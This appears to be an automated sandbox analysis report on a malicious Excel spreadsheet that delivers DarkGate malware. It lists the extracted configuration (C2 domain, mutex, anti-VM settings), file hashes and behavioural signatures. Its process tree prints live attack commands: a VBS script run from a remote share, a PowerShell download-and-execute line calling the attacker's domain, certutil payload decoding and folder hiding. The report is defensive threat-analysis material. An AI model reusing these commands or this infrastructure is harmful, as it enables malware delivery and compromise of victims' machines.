Resubmissions
15-03-2024 02:46
240315-c9qgnagg39 1015-03-2024 02:45
240315-c849esgg29 114-03-2024 17:53
240314-wgkkgsaf8s 114-03-2024 17:45
240314-wb7stsae5w 10Analysis
-
max time kernel
141s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
14-03-2024 17:45
Static task
static1
Behavioral task
behavioral1
Sample
march-D9445-2024.xlsx
Resource
win7-20240221-en
General
-
Target
march-D9445-2024.xlsx
-
Size
60KB
-
MD5
ac89528d1040074d45d5c19a0ceb7a6a
-
SHA1
8b47dba91232a0e1ac14cee24267e9c26d7e483c
-
SHA256
1d67808fee7115fa2597e8843aa10f737298c9f097397e5de486fc762753ea0b
-
SHA512
37da11cea5188cc7b7f6c9154410d9d663d5ed306313badbaa421025c49f90bff177613a132d2bff1b529ec214d9eb034937ab8d7830d30bd4451f1579a27feb
-
SSDEEP
1536:64N5DGhJDl5eZ9l0ohOplRfzDrtw86RUtdkV:643ChJR0vl0ohYlRfzD/6o2
Malware Config
Extracted
darkgate
admin888
nextroundst.com
-
anti_analysis
true
-
anti_debug
false
-
anti_vm
true
-
c2_port
80
-
check_disk
false
-
check_ram
false
-
check_xeon
false
-
crypter_au3
false
-
crypter_dll
false
-
crypter_raw_stub
false
-
internal_mutex
TuqohTUI
-
minimum_disk
50
-
minimum_ram
4000
-
ping_interval
6
-
rootkit
false
-
startup_persistence
true
-
username
admin888
Signatures
-
Detect DarkGate stealer 2 IoCs
resource yara_rule behavioral2/memory/4680-63-0x0000000004A60000-0x0000000004AD3000-memory.dmp family_darkgate_v6 behavioral2/memory/4680-65-0x0000000004A60000-0x0000000004AD3000-memory.dmp family_darkgate_v6 -
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 1568 2396 WScript.exe 90 -
Blocklisted process makes network request 4 IoCs
flow pid Process 116 1000 powershell.exe 122 1000 powershell.exe 151 1000 powershell.exe 153 1000 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Control Panel\International\Geo\Nation WScript.exe -
Executes dropped EXE 1 IoCs
pid Process 4680 AutoHotkey.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 5 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 AutoHotkey.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString AutoHotkey.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 2396 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 1000 powershell.exe 1000 powershell.exe 1000 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1000 powershell.exe -
Suspicious use of SetWindowsHookEx 13 IoCs
pid Process 2396 EXCEL.EXE 2396 EXCEL.EXE 2396 EXCEL.EXE 2396 EXCEL.EXE 2396 EXCEL.EXE 2396 EXCEL.EXE 2396 EXCEL.EXE 2396 EXCEL.EXE 2396 EXCEL.EXE 2396 EXCEL.EXE 2396 EXCEL.EXE 2396 EXCEL.EXE 2396 EXCEL.EXE -
Suspicious use of WriteProcessMemory 11 IoCs
description pid Process procid_target PID 2396 wrote to memory of 1568 2396 EXCEL.EXE 103 PID 2396 wrote to memory of 1568 2396 EXCEL.EXE 103 PID 1568 wrote to memory of 1000 1568 WScript.exe 105 PID 1568 wrote to memory of 1000 1568 WScript.exe 105 PID 1000 wrote to memory of 1680 1000 powershell.exe 107 PID 1000 wrote to memory of 1680 1000 powershell.exe 107 PID 1000 wrote to memory of 4680 1000 powershell.exe 109 PID 1000 wrote to memory of 4680 1000 powershell.exe 109 PID 1000 wrote to memory of 4680 1000 powershell.exe 109 PID 1000 wrote to memory of 3100 1000 powershell.exe 110 PID 1000 wrote to memory of 3100 1000 powershell.exe 110 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 3100 attrib.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\march-D9445-2024.xlsx"1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2396 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "\\64.226.97.86\share\EXCEL_OPEN_DOC.vbs"2⤵
- Process spawned unexpected child process
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1568 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (Invoke-RestMethod -Uri 'nextroundst.com/qzaugqmb')3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1000 -
C:\Windows\system32\certutil.exe"C:\Windows\system32\certutil.exe" -decodehex a.bin AutoHotkey.exe4⤵PID:1680
-
-
C:\st\AutoHotkey.exe"C:\st\AutoHotkey.exe" script.ahk4⤵
- Executes dropped EXE
- Checks processor information in registry
PID:4680
-
-
C:\Windows\system32\attrib.exe"C:\Windows\system32\attrib.exe" +h C:/st4⤵
- Views/modifies file attributes
PID:3100
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
892KB
MD5a59a2d3e5dda7aca6ec879263aa42fd3
SHA1312d496ec90eb30d5319307d47bfef602b6b8c6c
SHA256897b0d0e64cf87ac7086241c86f757f3c94d6826f949a1f0fec9c40892c0cecb
SHA512852972ca4d7f9141ea56d3498388c61610492d36ea7d7af1b36d192d7e04dd6d9bc5830e0dcb0a5f8f55350d4d8aaac2869477686b03f998affbac6321a22030
-
Filesize
1.7MB
MD5bf88d228baec74c7928df463db0f0fdc
SHA1efe1657bb9a9a31742b71d8c14bae89b2ab5533b
SHA256493099b55ea0da872d3b9855c5a60752833e737be547ebc5328caea2bf0542ed
SHA512c247a0dbba9971a8949729f888a4d8b10ca188b6fabedb9d1fe9cc7907cc4d807e66f3367ca287bf1e4062c342cbb7a724a9cc168018f55bc187e04897c8bdfa
-
Filesize
47KB
MD5c88f338fcf8601643ea31ba945f8145b
SHA1d006d7357cc38dd69f99b412a57965c7f048a0cc
SHA2569e794c12cbb367850dafd7e0791f992a0aa96211c373d9404209a89cf1b59f41
SHA512565841f1a1bdb0aa49b25ffca24f070369553c4d5d7703a3783a73d932857adbf6b6158ecc4b30e5263cac65be6372704337bd270acf2e2c850ab5abaaddd1c9
-
Filesize
913KB
MD5662041dc413d003ef0d57cccaad122a6
SHA11a79990a2ea16f5e1b33114c5add58e5c5b9be1b
SHA2564a2ec674725092d9a460ca58bcd7fc51473a37b2ecd606910a4ac57086c0e2f8
SHA51226a22c4524ac6f25cc470ee560edeaa5e8752fbcc201beef187b73ecf879799f2dffa14ab1c71ef35c6c6a02abb59ca02ff7e0beec644e5b52b1b04588976452